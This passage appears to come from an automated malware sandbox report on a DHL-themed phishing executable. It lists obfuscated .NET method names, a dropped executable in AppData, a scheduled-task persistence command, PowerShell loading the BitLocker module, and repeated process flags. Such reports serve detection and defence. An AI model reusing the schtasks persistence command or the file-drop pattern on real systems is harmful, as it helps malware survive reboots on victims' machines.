                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, G99NcAWGo5fdSa2ZsS.csHigh entropy of concatenated method names: 'gL0t93i1S9', 'hJutqn9pUl', 'V95t6WxshQ', 'xXxtKOnHPX', 'yubt2x3D99', 'PCNtbQVh3B', 'M9ttAMAdmZ', 'mqAtaK61Ne', 'bAfturja9P', 'PUXtwtjqkq'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, j8ssktVmGhRhLe0B6k.csHigh entropy of concatenated method names: 'tjtph5L6q0', 'p3UpgEE58c', 'sqfpGXexEJ', 'VOOpvQWJUJ', 'DrvpsYfXID', 'lMFpcfflGu', 'zL4ptJtxZj', 'GpIpVh8KJe', 'N1CpyQJwUH', 'Y5rpBefJj4'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, yo0WdWZos0SUx6um5v.csHigh entropy of concatenated method names: 'hZLiBIZJDm', 'ULJiUKK7dJ', 'ToString', 'Q5QigYnDvY', 'niIiGJ5XWs', 'dNjivahrUL', 'qS7isDecoR', 'RLLicyuwex', 'G3Pit7Ab32', 'smYiVBQqxE'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, dRPprFJEwfnXi7BZea.csHigh entropy of concatenated method names: 'dkiTQvDSrHBamW525RN', 'cIOP4wDMN3LOyj6NNtJ', 'U2xcLSxDe8', 'PfYckB3vFC', 'RPncCwhlma', 'TTGX0EDl35ry4mCVcuh', 'PARNMqDs6SPF08yfbJq'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, Yc0kDWG1u9wfr9y0I8.csHigh entropy of concatenated method names: 'Dispose', 'b6cDlPlGq2', 'nEdXJNMUQT', 'LDtOjb7dcn', 'o8BDxY5uq2', 'i9EDzvCgPM', 'ProcessDialogKey', 'kLyXELKHiU', 'hR6XDDe2Uu', 'CF1XXnuujM'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, CnHZ4nFFSQNWoh3XZ8.csHigh entropy of concatenated method names: 'FyU1aFkFU0', 'QIS1uFrEFY', 'O9N1RvRem0', 'FKm1JfZo3P', 'u6y1QFBqmk', 'D201HAmFoB', 'yiV13VNhao', 'u8C1IO7QKW', 'mo91oaFZbe', 'Ucv1M6RIRy'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, wFDKFK56TvYPu3IEkr.csHigh entropy of concatenated method names: 'Kfxi89qKIN', 'WNWixqV2Z9', 'RQOLEIEgTm', 'GPbLDOkn0L', 'r3AiMFMNhO', 'RwTinRxZ5I', 'GWSiFbfnDW', 'nUbid4PvRG', 'NegiSMJoyN', 'DTVi78I0nB'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, lLKHiUlsR6De2UuAF1.csHigh entropy of concatenated method names: 'YBakRNOPaQ', 'DaukJbEAUl', 'wDnk0TKhjW', 'jnCkQodEp2', 'Cj4kHHATFv', 'qoIkNddcYK', 'CGXk3qq9B1', 'WRQkIMDicx', 'F8akWvhJbr', 'GstkobW4sQ'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, eBMXbAdtYlyGT360Ka.csHigh entropy of concatenated method names: 'WBueolGTnN', 'qmhenslU1d', 'OgxedC0jy4', 'UlSeS0CRYf', 'qRDeJmjTD5', 'GUce0QwuRC', 'MHneQu87AB', 'OPHeHJavFc', 'U9yeNsQO2l', 'kIle3JH6Y4'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, OcHrdeaLLWK7BX0qEn.csHigh entropy of concatenated method names: 'Q1MGdCYbli', 'MqGGSNagVO', 'S3QG7hA5em', 'bmGGZPgyVZ', 'npWGj37gLJ', 'cXbG56fCaU', 'EN0G4YnHpo', 'JZIG8cFtHt', 'gnUGl4EnyR', 'miXGxpo3OY'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, ATQ7dwDXSlfahW1odIE.csHigh entropy of concatenated method names: 'ToString', 'VXPOapDbcq', 'lYiOuVHyLF', 'sSOOwRdCuG', 'HBbOR2wKSC', 'WhpOJTYKWa', 'hRdO0Flhle', 'qyHOQ5AKJq', 'WVBKxJdqLurNUuUiwhQ', 'TCdtJxdu9V8gyh8Igm6'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, hqeXMWDEKGoWC5nrtyW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pFACMq8xA9', 'AVUCnf60aI', 'CqMCFZVdLK', 'Xq9CdZbskc', 'R1MCSiRIyh', 'Xm0C7821wE', 'PmPCZbPZgy'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, nvBk4m3G4ZXSrBJYXB.csHigh entropy of concatenated method names: 'lOFtg1nA81', 'aKbtvJQDnb', 'wxRtceXpxM', 't2TcxiwmNE', 'zgjczTdd2Q', 'BhjtERFZVc', 'WbZtDbyA96', 'cTHtXMeGVT', 'J6UtpExZH8', 'HkEtP4LNBC'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, GqniEswF6biBLm0KlJ.csHigh entropy of concatenated method names: 'Cxys2ZLQ6a', 'UCBsAfqQAg', 'mL2v0ceBbe', 'hwSvQQ6wrW', 'IwavHKVjX9', 'R1XvN3tHmr', 'Nhkv3GWolO', 'S9yvIcVtlt', 'O9kvWsEe9R', 'R7NvoFbsfq'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, IvDoetz5KqokI1y0Cn.csHigh entropy of concatenated method names: 'LW3CbJvN7m', 'EWRCa3iNZB', 'w1mCu2VtQm', 'BFsCRW0glh', 'yTOCJFPjct', 'x6cCQn21yU', 'SrUCH3ME8T', 'Jv9Cm0UfYv', 'KoQC9pBCmE', 'cFUCq3mXat'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, bl8h2hPaa2j5IkYyGB.csHigh entropy of concatenated method names: 'pHMDtcHrde', 'qLWDVK7BX0', 'RMJDBVRT0Y', 'YIqDUvJqni', 'x0KDelJemV', 'MvpDY8jUVi', 'OeqreguNEoxgCawsQq', 'DVTXvnJJgjbYxTCoxl', 'anL2qPqkIpISEBCmc9', 'WP0DD7rWPX'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, AJLRIHDDdK562aLaZHO.csHigh entropy of concatenated method names: 'VHICxWBq8j', 'NwICzahj0P', 'X2GOEiU5uy', 'UsPODHeGms', 'xL4OXyvl5n', 'Xd2OpAulqq', 'FbcOPEUEDr', 'qoLOhuLx7g', 'MrGOg0DJWG', 'toVOGB9SFL'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, qrWO2JXi5BGLtLJQcd.csHigh entropy of concatenated method names: 'QCE659W0o', 'siKKb6UGh', 'VGebjoQcj', 'KuSAbSmhs', 'BS8uaQgta', 'bAFwDfl9s', 'Eibqet3Hr5b9f5aDXk', 'Mcy1iRNGEIC3iKZ3wO', 'rWLL3L8bm', 'bGNCT6bZv'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, loRipS4coX6cPlGq2e.csHigh entropy of concatenated method names: 'XLBkev771q', 'GxekiQg5Ie', 'ymnkklxCBQ', 'FiDkOHIHDi', 'fQEkryg3lv', 'SKUkmthuoy', 'Dispose', 'i6CLgW6FYr', 'PbfLGOEhST', 'gtyLvlIW2N'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, mpSvESuMJVRT0YxIqv.csHigh entropy of concatenated method names: 'iipvKfkYr0', 'a54vbeAhFS', 'iKJvah8yIa', 'VI9vuKvPok', 'yuqveK7cTo', 'RIIvYTWB4M', 'Eq0vidSlno', 'WqWvLDkSQA', 'basvkrcSDQ', 'n9UvCmKVmU'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, omVWvpR8jUViqCfHCT.csHigh entropy of concatenated method names: 'f1kchTpgp8', 'TIIcG6iGL7', 'unlcsaFk1J', 'ivNctuZCGV', 'hCtcVfWhGY', 'p3Ssj9D1Vx', 'rsds5J7fGK', 'ngxs4kR5Iq', 'etns8YpAqu', 'w4LslJ4RaD'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, uGsgAgDPMW45Q6ajTO7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WTYfkOE8QX', 'c2yfCRGNRY', 'omyfO8EWN0', 'Ot2ff7mjT9', 'dAYfrRYgRq', 'wB3fTo69Qh', 'ng1fmpRCld'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, G99NcAWGo5fdSa2ZsS.csHigh entropy of concatenated method names: 'gL0t93i1S9', 'hJutqn9pUl', 'V95t6WxshQ', 'xXxtKOnHPX', 'yubt2x3D99', 'PCNtbQVh3B', 'M9ttAMAdmZ', 'mqAtaK61Ne', 'bAfturja9P', 'PUXtwtjqkq'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, j8ssktVmGhRhLe0B6k.csHigh entropy of concatenated method names: 'tjtph5L6q0', 'p3UpgEE58c', 'sqfpGXexEJ', 'VOOpvQWJUJ', 'DrvpsYfXID', 'lMFpcfflGu', 'zL4ptJtxZj', 'GpIpVh8KJe', 'N1CpyQJwUH', 'Y5rpBefJj4'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, yo0WdWZos0SUx6um5v.csHigh entropy of concatenated method names: 'hZLiBIZJDm', 'ULJiUKK7dJ', 'ToString', 'Q5QigYnDvY', 'niIiGJ5XWs', 'dNjivahrUL', 'qS7isDecoR', 'RLLicyuwex', 'G3Pit7Ab32', 'smYiVBQqxE'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, dRPprFJEwfnXi7BZea.csHigh entropy of concatenated method names: 'dkiTQvDSrHBamW525RN', 'cIOP4wDMN3LOyj6NNtJ', 'U2xcLSxDe8', 'PfYckB3vFC', 'RPncCwhlma', 'TTGX0EDl35ry4mCVcuh', 'PARNMqDs6SPF08yfbJq'
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, Yc0kDWG1u9wfr9y0I8.csHigh entropy of concatenated method names: 'Dispose', 'b6cDlPlGq2', 'nEdXJNMUQT', 'LDtOjb7dcn', 'o8BDxY5uq2', 'i9EDzvCgPM', 'ProcessDialogKey', 'kLyXELKHiU', 'hR6XDDe2Uu', 'CF1XXnuujM'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, CnHZ4nFFSQNWoh3XZ8.csHigh entropy of concatenated method names: 'FyU1aFkFU0', 'QIS1uFrEFY', 'O9N1RvRem0', 'FKm1JfZo3P', 'u6y1QFBqmk', 'D201HAmFoB', 'yiV13VNhao', 'u8C1IO7QKW', 'mo91oaFZbe', 'Ucv1M6RIRy'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, wFDKFK56TvYPu3IEkr.csHigh entropy of concatenated method names: 'Kfxi89qKIN', 'WNWixqV2Z9', 'RQOLEIEgTm', 'GPbLDOkn0L', 'r3AiMFMNhO', 'RwTinRxZ5I', 'GWSiFbfnDW', 'nUbid4PvRG', 'NegiSMJoyN', 'DTVi78I0nB'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, lLKHiUlsR6De2UuAF1.csHigh entropy of concatenated method names: 'YBakRNOPaQ', 'DaukJbEAUl', 'wDnk0TKhjW', 'jnCkQodEp2', 'Cj4kHHATFv', 'qoIkNddcYK', 'CGXk3qq9B1', 'WRQkIMDicx', 'F8akWvhJbr', 'GstkobW4sQ'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, eBMXbAdtYlyGT360Ka.csHigh entropy of concatenated method names: 'WBueolGTnN', 'qmhenslU1d', 'OgxedC0jy4', 'UlSeS0CRYf', 'qRDeJmjTD5', 'GUce0QwuRC', 'MHneQu87AB', 'OPHeHJavFc', 'U9yeNsQO2l', 'kIle3JH6Y4'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, OcHrdeaLLWK7BX0qEn.csHigh entropy of concatenated method names: 'Q1MGdCYbli', 'MqGGSNagVO', 'S3QG7hA5em', 'bmGGZPgyVZ', 'npWGj37gLJ', 'cXbG56fCaU', 'EN0G4YnHpo', 'JZIG8cFtHt', 'gnUGl4EnyR', 'miXGxpo3OY'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, ATQ7dwDXSlfahW1odIE.csHigh entropy of concatenated method names: 'ToString', 'VXPOapDbcq', 'lYiOuVHyLF', 'sSOOwRdCuG', 'HBbOR2wKSC', 'WhpOJTYKWa', 'hRdO0Flhle', 'qyHOQ5AKJq', 'WVBKxJdqLurNUuUiwhQ', 'TCdtJxdu9V8gyh8Igm6'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, hqeXMWDEKGoWC5nrtyW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pFACMq8xA9', 'AVUCnf60aI', 'CqMCFZVdLK', 'Xq9CdZbskc', 'R1MCSiRIyh', 'Xm0C7821wE', 'PmPCZbPZgy'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, nvBk4m3G4ZXSrBJYXB.csHigh entropy of concatenated method names: 'lOFtg1nA81', 'aKbtvJQDnb', 'wxRtceXpxM', 't2TcxiwmNE', 'zgjczTdd2Q', 'BhjtERFZVc', 'WbZtDbyA96', 'cTHtXMeGVT', 'J6UtpExZH8', 'HkEtP4LNBC'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, GqniEswF6biBLm0KlJ.csHigh entropy of concatenated method names: 'Cxys2ZLQ6a', 'UCBsAfqQAg', 'mL2v0ceBbe', 'hwSvQQ6wrW', 'IwavHKVjX9', 'R1XvN3tHmr', 'Nhkv3GWolO', 'S9yvIcVtlt', 'O9kvWsEe9R', 'R7NvoFbsfq'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, IvDoetz5KqokI1y0Cn.csHigh entropy of concatenated method names: 'LW3CbJvN7m', 'EWRCa3iNZB', 'w1mCu2VtQm', 'BFsCRW0glh', 'yTOCJFPjct', 'x6cCQn21yU', 'SrUCH3ME8T', 'Jv9Cm0UfYv', 'KoQC9pBCmE', 'cFUCq3mXat'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, bl8h2hPaa2j5IkYyGB.csHigh entropy of concatenated method names: 'pHMDtcHrde', 'qLWDVK7BX0', 'RMJDBVRT0Y', 'YIqDUvJqni', 'x0KDelJemV', 'MvpDY8jUVi', 'OeqreguNEoxgCawsQq', 'DVTXvnJJgjbYxTCoxl', 'anL2qPqkIpISEBCmc9', 'WP0DD7rWPX'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, AJLRIHDDdK562aLaZHO.csHigh entropy of concatenated method names: 'VHICxWBq8j', 'NwICzahj0P', 'X2GOEiU5uy', 'UsPODHeGms', 'xL4OXyvl5n', 'Xd2OpAulqq', 'FbcOPEUEDr', 'qoLOhuLx7g', 'MrGOg0DJWG', 'toVOGB9SFL'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, qrWO2JXi5BGLtLJQcd.csHigh entropy of concatenated method names: 'QCE659W0o', 'siKKb6UGh', 'VGebjoQcj', 'KuSAbSmhs', 'BS8uaQgta', 'bAFwDfl9s', 'Eibqet3Hr5b9f5aDXk', 'Mcy1iRNGEIC3iKZ3wO', 'rWLL3L8bm', 'bGNCT6bZv'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, loRipS4coX6cPlGq2e.csHigh entropy of concatenated method names: 'XLBkev771q', 'GxekiQg5Ie', 'ymnkklxCBQ', 'FiDkOHIHDi', 'fQEkryg3lv', 'SKUkmthuoy', 'Dispose', 'i6CLgW6FYr', 'PbfLGOEhST', 'gtyLvlIW2N'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, mpSvESuMJVRT0YxIqv.csHigh entropy of concatenated method names: 'iipvKfkYr0', 'a54vbeAhFS', 'iKJvah8yIa', 'VI9vuKvPok', 'yuqveK7cTo', 'RIIvYTWB4M', 'Eq0vidSlno', 'WqWvLDkSQA', 'basvkrcSDQ', 'n9UvCmKVmU'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, omVWvpR8jUViqCfHCT.csHigh entropy of concatenated method names: 'f1kchTpgp8', 'TIIcG6iGL7', 'unlcsaFk1J', 'ivNctuZCGV', 'hCtcVfWhGY', 'p3Ssj9D1Vx', 'rsds5J7fGK', 'ngxs4kR5Iq', 'etns8YpAqu', 'w4LslJ4RaD'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, uGsgAgDPMW45Q6ajTO7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WTYfkOE8QX', 'c2yfCRGNRY', 'omyfO8EWN0', 'Ot2ff7mjT9', 'dAYfrRYgRq', 'wB3fTo69Qh', 'ng1fmpRCld'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, G99NcAWGo5fdSa2ZsS.csHigh entropy of concatenated method names: 'gL0t93i1S9', 'hJutqn9pUl', 'V95t6WxshQ', 'xXxtKOnHPX', 'yubt2x3D99', 'PCNtbQVh3B', 'M9ttAMAdmZ', 'mqAtaK61Ne', 'bAfturja9P', 'PUXtwtjqkq'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, j8ssktVmGhRhLe0B6k.csHigh entropy of concatenated method names: 'tjtph5L6q0', 'p3UpgEE58c', 'sqfpGXexEJ', 'VOOpvQWJUJ', 'DrvpsYfXID', 'lMFpcfflGu', 'zL4ptJtxZj', 'GpIpVh8KJe', 'N1CpyQJwUH', 'Y5rpBefJj4'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, yo0WdWZos0SUx6um5v.csHigh entropy of concatenated method names: 'hZLiBIZJDm', 'ULJiUKK7dJ', 'ToString', 'Q5QigYnDvY', 'niIiGJ5XWs', 'dNjivahrUL', 'qS7isDecoR', 'RLLicyuwex', 'G3Pit7Ab32', 'smYiVBQqxE'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, dRPprFJEwfnXi7BZea.csHigh entropy of concatenated method names: 'dkiTQvDSrHBamW525RN', 'cIOP4wDMN3LOyj6NNtJ', 'U2xcLSxDe8', 'PfYckB3vFC', 'RPncCwhlma', 'TTGX0EDl35ry4mCVcuh', 'PARNMqDs6SPF08yfbJq'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, Yc0kDWG1u9wfr9y0I8.csHigh entropy of concatenated method names: 'Dispose', 'b6cDlPlGq2', 'nEdXJNMUQT', 'LDtOjb7dcn', 'o8BDxY5uq2', 'i9EDzvCgPM', 'ProcessDialogKey', 'kLyXELKHiU', 'hR6XDDe2Uu', 'CF1XXnuujM'
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeFile created: C:\Users\user\AppData\Roaming\uvbIwIYe.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
